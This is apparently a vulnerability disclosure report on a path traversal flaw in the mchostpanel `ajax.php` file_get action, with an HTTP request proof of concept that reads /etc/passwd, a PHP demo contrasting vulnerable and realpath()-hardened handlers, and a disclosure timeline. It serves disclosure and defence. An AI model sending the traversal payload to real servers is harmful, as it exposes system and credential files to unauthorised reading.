Path Traversal in alanaktion/mchostpanel

Valid

Reported on

Sep 5th 2021


✍️ Description

A path traversal vulnerability was identified in the mchostpanel Minecraft server control panel. The `file_get` action of `ajax.php` takes a `file` parameter from the request and uses it as a path without rejecting `..` segments, so an attacker can step out of the intended directory and read arbitrary files on the host (the proof of concept below reads `/etc/passwd`).

🕵️‍♂️ Proof of Concept

POST /ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: curl/7.47.0
Accept: */*
Content-Length: 45
Content-Type: application/x-www-form-urlencoded

req=file_get&file=..%2F..%2F..%2Fetc%2Fpasswd
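The request above only works because the handler joins the client-supplied name onto a directory and opens the result as-is. The following PHP is an added example, not mchostpanel's own code: it reconstructs that vulnerable shape next to a hardened version that canonicalises both paths with realpath() and refuses anything that does not stay under the base directory. The function names, the `$base` directory and the sample requests are assumptions for illustration; the traversal payload is the PoC's `file` value after the web server has URL-decoded it.

```php
<?php
// Added example, not code from alanaktion/mchostpanel. It reconstructs the
// class of handler the report describes (a "file_get" action that reads a
// path taken straight from the request) beside a containment check that
// stops the ../ sequences in the PoC. Function names, $base and the sample
// requests below are assumptions made for this illustration.

// Vulnerable shape: the user-controlled name is joined onto the base
// directory and opened as-is, so "../../../etc/passwd" walks out of $base.
function file_get_vulnerable($base, $file)
{
    return @file_get_contents($base . '/' . $file);
}

// Hardened shape: resolve both paths with realpath() and refuse anything
// that does not stay inside the base directory. realpath() collapses "..",
// resolves symlinks and works on the already-decoded path, so the check is
// made on the canonical on-disk location rather than on the client's string.
function file_get_safe($base, $file)
{
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return false;
    }
    // Reject NUL bytes outright; some file APIs truncate the path at them.
    if (strpos($file, "\0") !== false) {
        return false;
    }
    $target = realpath($baseReal . DIRECTORY_SEPARATOR . $file);
    // realpath() returns false for a non-existent file, which also covers
    // traversal attempts that point at paths which do not exist.
    if ($target === false) {
        return false;
    }
    // Require the canonical target to sit strictly below the canonical base.
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return file_get_contents($target);
}

// Demo against a throwaway directory (constructed sample data).
$base = sys_get_temp_dir() . '/mchostpanel-demo-' . getmypid();
mkdir($base);
file_put_contents($base . '/server.properties', "motd=hello\n");
// A symlink inside the base that points outside it: string checks on the
// request alone would pass it, realpath() does not.
@symlink('/etc/passwd', $base . '/escape.link');

$requests = [
    'server.properties',                          // legitimate request
    urldecode('..%2F..%2F..%2Fetc%2Fpasswd'),     // the PoC's file parameter
    'escape.link',                                // symlink out of the base
];
foreach ($requests as $file) {
    $v = file_get_vulnerable($base, $file);
    $s = file_get_safe($base, $file);
    printf("%-24s vulnerable: %-7s hardened: %s\n",
        $file,
        $v === false ? 'denied' : 'READ',
        $s === false ? 'denied' : 'READ');
}

@unlink($base . '/escape.link');
unlink($base . '/server.properties');
rmdir($base);
```

Run with `php example.php` on a Linux host: the vulnerable function returns the contents of `/etc/passwd` for both the `..` payload and the symlink, while the hardened function serves only `server.properties`. The prefix comparison uses the canonical base plus a trailing separator so that a sibling directory such as `/srv/panel-data2` cannot pass a check meant for `/srv/panel-data`.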

💥 Impact

This issue allows an attacker to read arbitrary local files that are readable by the web server process, resulting in information disclosure (for example `/etc/passwd` as shown above, and any configuration or credential files on the same host).

Occurrences

We have contacted a member of the alanaktion/mchostpanel team and are waiting to hear back 2 years ago
Alan Hardman validated this vulnerability 2 years ago
Dwi Siswanto has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alan Hardman marked this as fixed with commit 27d5a9 2 years ago
Alan Hardman has been awarded the fix bounty
This vulnerability will not receive a CVE
Dwi Siswanto
2 years ago

Researcher


Can we assign CVE for this, @admin?

Jamie Slome
2 years ago

Admin


Hello @dwisiswant0 - we just need to get confirmation from the maintainer before assigning a CVE, when our system does not automatically assign one.

@alanaktion - are you happy for us to assign a CVE against this report?
